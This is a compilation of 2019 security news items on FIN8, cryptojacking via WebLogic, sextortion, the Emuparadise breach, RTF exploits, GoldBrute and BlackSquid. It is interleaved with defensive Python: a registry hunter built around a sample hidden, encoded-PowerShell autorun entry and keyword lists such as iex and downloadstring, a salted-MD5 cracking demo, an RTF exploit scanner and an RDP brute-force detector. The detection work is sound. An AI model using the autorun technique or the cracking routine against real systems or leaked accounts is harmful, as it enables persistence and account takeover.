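RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    "[" + RUN_KEY + "]",
    '"OneDrive"=' + reg_quote(r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    '"Updater"=' + reg_quote("powershell.exe -NoP -W Hidden -enc " + ps_encode(STAGE1)),
    "",
    r"[HKEY_CURRENT_USER\Software\Temp]",
    '"p1"=' + reg_quote(STAGE2),
    "",
])

# --- hunting logic ------------------------------------------------------------
ENC_FLAG = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
AUTORUN_SUFFIXES = (r"\CurrentVersion\Run", r"\CurrentVersion\RunOnce")
SCRIPT_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                  "new-object", "get-itemproperty")


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: value}} for the string values in a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith(('"', "@")) and "=" in line:
            name, _, raw = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            if raw.startswith('"') and raw.endswith('"'):
                # undo the export's escaping: \\ -> \ and \" -> "
                keys[current][name] = re.sub(r'\\(["\\])', r"\1", raw[1:-1])
    return keys


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand (powershell.exe accepts any unambiguous
    prefix such as -e, -ec or -enc), or None when the command line carries none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(reg: dict) -> list:
    """Flag autorun entries that launch PowerShell, decode their payload, and flag any
    non-autorun value whose content reads like a PowerShell script body."""
    findings = []
    for key, values in reg.items():
        is_autorun = key.endswith(AUTORUN_SUFFIXES)
        for name, value in values.items():
            low, hits, decoded = value.lower(), [], None
            if is_autorun and "powershell" in low:
                hits.append("powershell-autorun")
                if re.search(r"-w(?:indowstyle)?\s+hidden", low):
                    hits.append("hidden-window")
                decoded = decode_encoded_command(value)
                if decoded is not None:
                    hits.append("encoded-command")
                    if re.search(r"get-itemproperty|hk(?:cu|lm):", decoded, re.I):
                        hits.append("reads-registry")
                    if re.search(r"\biex\b|invoke-expression", decoded, re.I):
                        hits.append("invoke-expression")
            elif not is_autorun and sum(marker in low for marker in SCRIPT_MARKERS) >= 2:
                hits.append("script-body-in-registry")
            if hits:
                findings.append({"key": key, "name": name, "indicators": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_reg(SAMPLE_REG)):
        print(f"{f['key']}\\{f['name']}: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

On a live host the same logic applies to the output of `reg export HKCU\Software out.reg` (and the HKLM Run keys); the "script-body-in-registry" rule is deliberately loose, because the stage that matters is the one the autorun stub reads back, which sits under whatever key name the attacker chose.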
Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.
“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8, we’ve seen multiple attacks by FIN6, FIN7 and others.” concludes Morphisec.
“Many POS networks are running on the POS version of Windows 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability. As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses.”
Every month, we dig through cybersecurity trends and advice for our readers. This edition: GDPR+1, the cost of cybercrime revealed, and a ransomware racket.
If you notice this notice…
If year one of GDPR has taught us anything, it’s that we can expect more data breach reports, which means more notifications. Most national supervisory authorities saw an increase in queries and complaints compared to 2017, the European Data Protection Board found.
But are companies following through with breach notifications that are effective, and easy to understand? Possibly not. Researchers from the University of Michigan analysed 161 sample notifications using readability guidelines, and found confusing language that doesn’t clarify whether consumers’ private data is at risk.
The researchers had previously found that people often don’t take action after being informed of a data breach. Their new findings suggest a possible connection with poorly worded notifications. That’s why the report recommends three steps for creating more usable and informative breach notifications.
Pay more attention to visual attractiveness (headings, lists and text formatting) and visually highlight key information.
Make the notice readable and understandable to everyone by using short sentences, common words (and very little jargon), and by not including unnecessary information.
Avoid hedge terms and wording claims like “there is no evidence of misuse”, because consumers could misinterpret this as evidence that there is no risk.
AT&T inadvertently gave an insight into its own communications process after mistakenly publishing a data breach notice recently. Vice Motherboard picked up the story, and pointed out that its actions would have alarmed some users. But it also reckoned AT&T deserves praise for having a placeholder page ready in case of a real breach. Hear, hear. At BH Consulting, we’re big advocates of advance planning for potential incidents.
The cost of cybercrime, updated
Around half of all property crime is now online, when measured by volume and value. That’s the key takeaway from a new academic paper on the cost of cybercrime. A team of nine researchers from Europe and the USA originally published work on this field in 2012 and wanted to evaluate what’s changed. Since then, consumers have moved en masse to smartphones over PCs, but the pattern of cybercrime is much the same.
The body of the report looks at what’s known about the various types of crime and what’s changed since 2012. It covers online card frauds, ransomware and cryptocrime, fake antivirus and tech support scams, business email compromise, telecoms fraud along with other related crimes. Some of these crimes have become more prominent, and there’s also been fallout from cyberweapons like the NotPetya worm. It’s not all bad news: crimes that infringe intellectual property are down since 2012.
Ross Anderson, professor of security engineering at Cambridge University and a contributor to the research, has written a short summary. The full 32-page study is free to download as a PDF here.
Meanwhile, one expert has estimated fraud and cybercrime costs Irish businesses and the State a staggering €3.5bn per year. Dermot Shea, chief of detectives with the NYPD, said the law is often behind criminals. His sentiments match those of the researchers above. They concluded: “The core problem is that many cybercriminals operate with near-complete impunity… we should certainly spend an awful lot more on catching and punishing the perpetrators.” Speaking of which, Europol released an infographic showing how the GozNym criminal network operated, following the arrest of 10 people connected with the gang.
Any ransomware victim will know that their options are limited: restore inaccessible data from backups (assuming they exist), or grudgingly pay the criminals because they need that data badly. The perpetrators often impose time limits to amp up the psychological squeeze, making marks feel like they have no other choice.
Enter third-party companies that claim to recover data on victims’ behalf. A pricey but risk-free option? It turns out, maybe not. If it sounds too good to be true, it probably is. And that’s just what some top-quality sleuthing by ProPublica unearthed: it found two companies that simply paid the ransom and pocketed the profit, without telling law enforcement or their customers.
This is important because ransomware is showing no signs of stopping. Fortinet’s latest Q1 2019 global threat report said these types of attacks are becoming targeted. Criminals are customising some variants to go after high-value targets and to gain privileged access to the network. Figures from Microsoft suggest ransomware infection levels in Ireland dropped by 60 per cent. Our own Brian Honan cautioned that last year’s figures might look good just because 2017 was a blockbuster year that featured WannaCry and NotPetya.
Links we liked
Finally, here are some cybersecurity stories, articles, think pieces and research we enjoyed reading over the past month.
If you confuse them, you lose them: a post about clear security communication. MORE
This detailed Wired report suggests Bluetooth’s complexity is making it hard to secure. MORE
Got an idea for a cybersecurity company? ENISA has published expert help for startups. MORE
A cybersecurity apprenticeship aims to provide a talent pipeline for employers. MORE
Remember the Mirai botnet malware for DDoS attacks? There’s a new variant in town. MORE
The hacker and pentester Tinker shares his experience in a revealing interview. MORE
So it turns out most hackers for hire are just scammers. MORE
The cybersecurity landscape and the role of the military. MORE
What are you doing this afternoon? Just deleting my private information from the web. MORE
The CVE-2019-2725 vulnerability in Oracle WebLogic, recently addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.
Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.
The flaw is a deserialization remote command execution vulnerability, exploited as a zero-day, that affects the Oracle WebLogic wls9_async and wls-wsat components.
At the time of disclosure the issue affected all WebLogic versions, including the latest one, that had the wls9_async_response.war and wls-wsat.war components enabled.
Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.
An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.
The CVE-2019-2725 flaw was patched in late April; unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.
After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.
The malware used in this campaign hides its malicious code in certificate files to evade detection.
The attackers exploit the CVE-2019-2725 flaw to execute a command on the vulnerable server, and that command performs a series of routines.
“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.
“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”
The attack chain starts with a PowerShell command that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then executes the result with PowerShell. The downloaded file is then deleted using cmd.
The downloaded file is laid out like a Privacy-Enhanced Mail (PEM) certificate, but its Base64 body decodes to a PowerShell command rather than to an X.509 certificate.
“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”
The command in the certificate file is used by the crooks to download and execute another PowerShell script in memory. That script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script run in memory), Sysguard.exe (watchdog for the miner process), and Clean.bat (deletes other components).
Experts noticed that the update.ps1 file containing the decoded certificate content is replaced with a new update.ps1, and a scheduled task is created to execute the new PowerShell script every 30 minutes.
Hiding malware in certificate files is not a novelty: experts at Sophos explored this technique in a proof of concept late last year.
“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”
Crooks are posing as CIA agents in a sextortion campaign, they are sending emails to inform the victims of an investigation into online pedophilia rings.
Crooks are posing as CIA agents in a new sextortion campaign, they are sending emails to inform potential victims of an ongoing investigation into online pedophilia rings.
Fraudsters are offering to drop the investigations on the victims for money, according to experts at Kaspersky.
“The author of the e-mails that caught our experts’ collective eye poses as a CIA officer who has allegedly found the recipient’s details in Case #45361978 (relating to possession and distribution of child pornography, or so it seems). ” reads a post published by Kaspersky. “The “officer” states that the CIA is about to swoop in on more than 2,000 individuals suspected of pedophilia in 27 countries around the globe. The message implies that the recipient is accused of being one of them. “
Crooks claim they are conducting a “large international operation set to arrest more than 2000 individuals in 27 countries.”
To scare people into paying, the fraudsters claim to have collected evidence of the illegal activities: they tell the victims that they have the mark’s home and work addresses and contact information, and that they have recorded each recipient’s ISP and browsing history, social media activity, chat logs, and Tor browsing activity.
The fake CIA agents are offering to drop the investigation and destroy the evidence for a $10,000 Bitcoin payout.
“I read the documentation and I know you are a wealthy person who may be concerned about reputation,” reads the scam email message sent to the victims. “I am one of several people who have access to those documents and I have enough security clearance to amend and remove your details from this case.”
Sextortion campaigns are not a novelty in the threat landscape; in most cases the victims fear reputational damage if the attackers expose their alleged habits to friends and colleagues.
The messages used in the “CIA” sextortion campaign are well written with a good layout, so they look authentic.
“Such messages are sent to thousands or even millions of people in the hope that just a handful will swallow the bait,” explained Kaspersky senior anti-spam analyst Tatyana Scherbakova.
“Given the size of the ransom, if even a few victims pay up, it will have been worth the cybercriminals’ time and effort.”
Below the recommendations provided by Kaspersky:
Never pay scammers; that would only encourage the extortionists even more.
Do not respond to the e-mail, even if you really want to prove to the author that your name is in the “case file” by mistake. By doing so, you would be confirming that your address is valid and provoke an even greater wave of spam. For the same reason, do not try to troll the scammers.
Close the message and mark it as spam — this will help the spam filter to do its job better.
Retro video game website Emuparadise revealed to have suffered a data breach that exposed 1.1 Million accounts back in April 2018.
Emuparadise is a website that offered a huge catalogue of ROMs, ISOs and retro video games; users could download them and play them with an emulator, or play them directly in the web browser.
The security breach occurred in April 2018 and exposed account information for approximately 1.1 million Emuparadise forum members.
Since August 2018 Emuparadise has no longer hosted game ROMs, but it continues to offer all kinds of information on retro video games and to operate its community forums.
Over the weekend, some Emuparadise forum members reported receiving data breach notifications from the popular services Have I Been Pwned and HackNotice. The notices inform them that their data were exposed in the breach that occurred in April 2018.
The notice issued by the service Have I Been Pwned states that 1,131,229 accounts from Emuparadise forums were exposed in an incident occurred in April 2018. The forums run on a vBulletin CMS, a very popular platform, but older versions are known to be vulnerable to several issues.
HIBP received the data from dehashed.com on June 9th, 2019. The exposed info includes email addresses, IP addresses, usernames and passwords stored as salted MD5 hashes.
“In April 2018, the self-proclaimed “biggest retro gaming website on earth”, Emuparadise, suffered a data breach.” states Have I Been Pwned. “The compromised vBulletin forum exposed 1.1 million email addresses, IP address, usernames and passwords stored as salted MD5 hashes.”
At the time of writing, it is not known how DeHashed obtained the huge trove of data.
Experts pointed out that Emuparadise data have been offered for sale in the cybercrime underground and on hacking forums since early 2019.
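Salted MD5 is the weak point in that description. The block below is an added illustration, not code from Emuparadise, vBulletin or HIBP: it assumes the md5(md5(password) + salt) construction used by vBulletin 3 and 4 (the page itself only says "salted MD5"), builds two constructed records, and shows that the salt only blocks a precomputed table shared across users; a per-user dictionary run still costs two MD5 calls per guess, which the last function contrasts with a deliberately slow KDF.

```python
import hashlib
import time


def vb_hash(password: str, salt: str) -> str:
    """Assumed vBulletin 3/4 scheme: md5(md5(password) + salt), both as hex digests."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


# Constructed records, not taken from the Emuparadise dump.
SALTS = {"alice": "K3x", "bob": "q9Z"}
LEAKED = {"alice": vb_hash("dragon", "K3x"), "bob": vb_hash("winter2018", "q9Z")}
WORDLIST = ["123456", "password", "dragon", "qwerty", "letmein", "winter2018", "emuparadise"]


def crack(records: dict, salts: dict, wordlist: list) -> dict:
    """Per-user dictionary attack. The salt means a table of md5(md5(word)) cannot be
    shared between users, but re-hashing the wordlist per user is still only 2 MD5 calls
    per guess, so short per-user salts barely slow an attacker down."""
    found = {}
    for user, digest in records.items():
        for word in wordlist:
            if vb_hash(word, salts[user]) == digest:
                found[user] = word
                break
    return found


def guesses_per_second(seconds: float = 0.2) -> float:
    """Single-core rate of this scheme in pure Python; a GPU cracker is orders of magnitude faster."""
    n, end = 0, time.perf_counter() + seconds
    while time.perf_counter() < end:
        vb_hash("candidate%d" % n, "K3x")
        n += 1
    return n / seconds


def slowdown_vs_pbkdf2(iterations: int = 100_000) -> float:
    """How many vBulletin-style guesses fit in the time of one PBKDF2-HMAC-SHA256 guess."""
    t0 = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", b"candidate", b"K3x", iterations)
    t_kdf = time.perf_counter() - t0
    t0 = time.perf_counter()
    for _ in range(2000):
        vb_hash("candidate", "K3x")
    t_md5 = (time.perf_counter() - t0) / 2000
    return t_kdf / t_md5


if __name__ == "__main__":
    print("cracked:", crack(LEAKED, SALTS, WORDLIST))
    print("guesses/s (pure Python):", int(guesses_per_second()))
    print("one PBKDF2 guess costs as much as", int(slowdown_vs_pbkdf2()), "salted-MD5 guesses")
```

The practical consequence for anyone in this dump is the usual one: the salt does not make a reused password safe, and any password that appears in a wordlist should be treated as already known.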
Spanish authorities extradited 94 Taiwanese to China to face telephone and online fraud charges, Taiwan’s Foreign Ministry expressed a strong regret.
Spain extradited 94 Taiwanese to China to face telephone and online fraud charges; the suspects were flown to Beijing under escort.
“The suspects arrived Friday morning at Beijing airport on a chartered flight. Footage on state broadcaster CCTV showed uniformed officers escorting them off the China Eastern plane one-by-one.” reads a post published by the AP.
The Taiwan Central News Agency reported that Taiwan’s Foreign Ministry expressed “serious concern and strong regret.”
The investigation into the scam operations run from Spain started in 2016; the crooks targeted victims in China. A joint operation conducted by Chinese and Spanish police allowed the identification of the people involved. In December, authorities raided 13 sites in Madrid, Barcelona and other cities in Spain.
These arrests are considered the result of the first joint operation conducted by China with a European country against telecom fraud.
According to the Chinese Public Security Ministry, the telephone and online frauds allowed the suspects to earn 120 million yuan ($17 million).
In the fraud scheme, the criminals impersonate Chinese authorities and attempt to trick victims into transferring money to accounts controlled by the scammers.
“Similar scams operate from several countries and usually prey on Chinese.” continues the AP. “The callers typically masquerade as Chinese authorities and pressure or persuade the victims to transfer money to the scammers’ accounts.”
Spanish authorities have already extradited 225 suspects, 218 of whom are Taiwanese.
Even though Taiwan split from China in 1949 during a civil war, Beijing still considers the island part of its territory. The two governments signed an agreement in 2009 to join efforts in the fight against crime.
Tension between the two sides peaked after the election of Taiwanese President Tsai Ing-wen, who is not considered aligned with Beijing.
Chinese authorities have asked foreign countries, including Spain, to send the suspects to China, where they would face severe sentences.
Taiwan evidently does not agree with the decision of the Spanish authorities to extradite the suspects to China instead of Taiwan.
Liu Zhongyi, deputy director of the Chinese Criminal Investigation Bureau, highlighted the difficulties associated with international investigations that involve the different legal frameworks of different states, such as China and Spain.
“We have overcome various difficulties,” Liu told CCTV.
Liu explained that many other criminal gangs operating in the China-Myanmar border area and in Southeast Asia are targeting Chinese citizens.
Microsoft is warning of an active spam campaign, targeting users in several European languages, that leverages an exploit to infect a machine simply by opening the attachment.
Microsoft issued a warning on Friday about an ongoing spam campaign that is targeting European users. The spam messages carry weaponized RTF documents that infect users with malware without any interaction beyond opening the document.
The spam messages are sent in various European languages, and the threat actors are exploiting the Microsoft Office and WordPad CVE-2017-11882 vulnerability. The tech giant published a series of tweets warning of the spam campaign:
“In the new campaign, the RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload. The backdoor payload then tries to connect to a malicious domain that’s currently down.” warns Microsoft.
The CVE-2017-11882 flaw is a memory-corruption issue that, at the time of its disclosure, affected all versions of Microsoft Office released in the previous 17 years, including the then-latest Microsoft Office 365, and could be triggered on all versions of the Windows operating system, including the Windows 10 Creators Update.
The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.
The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.
Even though the flaw was patched in 2017, experts at Microsoft continue to see threat actors exploiting it in the wild, with a peak in the number of attacks leveraging the issue over the past few weeks.
“Notably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.” states Microsoft.
Once the RTF attachment is opened, it will execute multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload.
The payload used in this campaign is a backdoor that attempts to connect to a malicious domain that is no longer accessible.
However, experts at Microsoft believe that attackers may use the same tactic to spread a new version of the backdoor that connects to an active C2.
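Exploit documents for CVE-2017-11882 carry the Equation Editor object inside an RTF \objdata stream, so the object's class name or COM CLSID in that stream is a usable mail-gateway check. The scanner below is an added example, not Microsoft's detection logic; it constructs its own RTF samples (an OLE 1.0 container around a compound-file header stand-in, with no exploit bytes) and tolerates the whitespace and nested-group tricks that exploit generators use to break naive hex parsing.

```python
import re
import struct

# Equation Editor's COM class {0002CE02-0000-0000-C000-000000000046} as the GUID is
# laid out on disk (Data1..Data3 little-endian) inside the embedded compound file.
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def extract_objdata(rtf: str):
    """Yield the bytes of every \\objdata group. Whitespace, nested {} and interleaved
    control words are skipped, since exploit generators sprinkle those in to defeat
    scanners that expect one clean hex run."""
    for m in re.finditer(r"\\objdata\b", rtf):
        depth, i, hexchars = 1, m.end(), []
        while i < len(rtf) and depth > 0:
            ch = rtf[i]
            if ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
            elif ch == "\\":
                cw = re.match(r"\\(?:[A-Za-z]+-?\d*|'[0-9A-Fa-f]{2}|.)", rtf[i:])
                i += len(cw.group(0)) if cw else 1
                continue
            elif ch in "0123456789abcdefABCDEF":
                hexchars.append(ch)
            i += 1
        data = "".join(hexchars)
        yield bytes.fromhex(data[: len(data) & ~1])


def scan_rtf(rtf: str) -> dict:
    """Return the Equation Editor indicators found in an RTF document."""
    hits = set()
    if re.search(r"\\objclass\s+Equation\.\d", rtf, re.I):
        hits.add("objclass-equation")
    if re.search(r"\\objupdate\b", rtf):
        hits.add("objupdate-autoload")  # forces the object to load when the document opens
    for blob in extract_objdata(rtf):
        if b"Equation." in blob:
            hits.add("equation-classname-in-objdata")
        if EQUATION_CLSID in blob:
            hits.add("equation-clsid-in-objdata")
    equation = {h for h in hits if h.startswith("equation") or h == "objclass-equation"}
    return {"suspicious": bool(equation), "indicators": sorted(hits)}


# --- constructed samples (no real exploit, only the container) ---------------
def ole1_embed(class_name: bytes, native: bytes) -> bytes:
    """Approximate the OLE 1.0 embedded-object header Word writes into \\objdata:
    OLEVersion, FormatID (2 = embedded), length-prefixed ANSI class name, empty
    topic and item names, then the native data length and the data itself."""
    return (struct.pack("<II", 0x00000501, 2)
            + struct.pack("<I", len(class_name) + 1) + class_name + b"\x00"
            + struct.pack("<II", 0, 0)
            + struct.pack("<I", len(native)) + native)


def build_rtf(objclass: str, native: bytes, obfuscate: bool = False, update: bool = False) -> str:
    """Constructed RTF carrying one embedded object."""
    hexdata = ole1_embed(objclass.encode("ascii"), native).hex()
    if obfuscate:  # drop the \objclass hint, break the hex across lines, insert an empty group
        hexdata = "\n".join(hexdata[i:i + 32] for i in range(0, len(hexdata), 32))
        hexdata = hexdata[:50] + "{}" + hexdata[50:]
    parts = ["{\\rtf1\\ansi{\\object\\objemb"]
    if update:
        parts.append("\\objupdate")
    if not obfuscate:
        parts.append("{\\*\\objclass %s}" % objclass)
    parts.append("{\\*\\objdata %s}}\\par}" % hexdata)
    return "".join(parts)


EXPLOIT_NATIVE = CFB_MAGIC + b"\x00" * 24 + EQUATION_CLSID + b"\x00" * 32  # compound-file stand-in
BENIGN_NATIVE = CFB_MAGIC + b"\x00" * 72

if __name__ == "__main__":
    for label, doc in (("plain", build_rtf("Equation.3", EXPLOIT_NATIVE, update=True)),
                       ("obfuscated", build_rtf("Equation.3", EXPLOIT_NATIVE, obfuscate=True)),
                       ("benign", build_rtf("Excel.Sheet.8", BENIGN_NATIVE))):
        print(label, scan_rtf(doc))
```

A hit here means "this document wants Equation Editor loaded", not "this document is exploit code", which is the right granularity for quarantine: the November 2017 patch is the fix, Microsoft removed the Equation Editor component from Office in its January 2018 updates, and the documented interim workaround was a COM kill-bit (Compatibility Flags = 0x400 under HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility for that CLSID).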
A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.
A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.
The botnet is currently targeting over 1.5 million unique endpoints online; it is used to brute-force RDP logins and to carry out credential stuffing attacks.
“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shodan lists about 2.4 million exposed servers. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote researcher Renato Marinho of Morphus Labs, who discovered the bot.
The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333.
Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.
“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.
“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.”
Below the complete attack chain:
Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
GoldBrute bot gets different “host + username + password” combinations.
Bot performs brute-force attack and reports result back to C2 server.
According to the researcher, the list of “brutable” RDP targets is growing rapidly, which suggests that the size of the botnet is also increasing.
“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.
“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”
The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.
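Because each bot makes a single guess, a per-source failed-logon threshold never fires. The added example below is not from the Morphus Labs report: it builds constructed Windows Security log extracts for event 4625 and compares the usual per-source rule with a rule that counts distinct sources per target account inside a time window, which is the pattern GoldBrute leaves behind.

```python
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "time event_id target_user source_ip logon_type status")


def build_sample_log() -> list:
    """Constructed Security-log extracts, not real telemetry. Fields:
    time,event_id,target_user,source_ip,logon_type,status. Twelve different sources each
    try 'administrator' once, 90 seconds apart (one guess per bot); alice mistypes her own
    password three times from a single host. Addresses are documentation ranges."""
    base = datetime(2019, 6, 7, 10, 0, 0)
    lines = [f"{base + timedelta(seconds=90 * i):%Y-%m-%dT%H:%M:%S}Z,4625,administrator,"
             f"198.51.100.{10 + i},10,0xC000006D" for i in range(12)]
    lines += [f"{base + timedelta(minutes=1 + i):%Y-%m-%dT%H:%M:%S}Z,4625,alice,"
              f"203.0.113.5,10,0xC000006A" for i in range(3)]
    return lines


def parse_events(lines: list) -> list:
    """Keep failed logons (4625) of the RDP kinds: 10 = RemoteInteractive, 3 = network,
    which is how failures land when Network Level Authentication is in front of RDP."""
    events = []
    for line in lines:
        t, eid, user, ip, ltype, status = line.strip().split(",")
        ev = Event(datetime.strptime(t, "%Y-%m-%dT%H:%M:%SZ"), int(eid), user.lower(),
                   ip, int(ltype), status)
        if ev.event_id == 4625 and ev.logon_type in (3, 10):
            events.append(ev)
    return sorted(events, key=lambda e: e.time)


def per_source_rule(events: list, threshold: int = 5,
                    window: timedelta = timedelta(minutes=30)) -> set:
    """The usual rule: N failures from one source IP inside the window. Blind to GoldBrute."""
    recent, alerts = defaultdict(deque), set()
    for ev in events:
        q = recent[ev.source_ip]
        q.append(ev.time)
        while ev.time - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts.add(ev.source_ip)
    return alerts


def distributed_rule(events: list, min_sources: int = 8,
                     window: timedelta = timedelta(minutes=30)) -> dict:
    """Count distinct sources per target account instead: many one-shot failures against
    the same account is the botnet's fingerprint. Returns {account: peak distinct sources}."""
    recent, alerts = defaultdict(deque), {}
    for ev in events:
        q = recent[ev.target_user]
        q.append((ev.time, ev.source_ip))
        while ev.time - q[0][0] > window:
            q.popleft()
        sources = {src for _, src in q}
        if len(sources) >= min_sources:
            alerts[ev.target_user] = max(alerts.get(ev.target_user, 0), len(sources))
    return alerts


if __name__ == "__main__":
    evs = parse_events(build_sample_log())
    print("per-source rule :", per_source_rule(evs) or "nothing")
    print("distributed rule:", distributed_rule(evs))
```

Keying on the target account rather than the source is what makes the difference; the same idea works one layer out, counting distinct sources completing TCP handshakes to 3389 on a host, and the threshold should be set from the normal number of distinct administrator sources a server actually sees, which on most hosts is very small.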
The report published by Marinho also includes a list of IoCs.
A new piece of malware dubbed BlackSquid has appeared in the threat landscape; it targets web servers with several exploits to deliver cryptocurrency miners.
Security experts at Trend Micro have discovered a new Monero-mining malware, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.
The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.
According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.
“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”
The peculiarity of the BlackSquid malware is its use of a set of the most dangerous known exploits.
While many forms of malicious code employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard.
The threat is delivered via infected web pages, exploits, or through removable and network drives.
BlackSquid uses the GetTickCount API to seed the random selection of web server IP addresses that it then attempts to infect.
The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.
“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.” continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”
The malware halts the infection routine if at least one of the following conditions is met:
The victim’s username is included in a list of common sandbox usernames;
The disk drive model is equal to one included in a specific list;
The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.
BlackSquid uses the EternalBlue and DoublePulsar exploits (MS17-010, an SMB RCE flaw) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same rights as the local system user.
If the WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation) query finds an Nvidia or AMD video card on the infected system, the malicious code downloads a second component to mine with the graphics processing unit (GPU).
Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.
The presence of coding errors and skipped routines suggests that BlackSquid is still in development and testing.
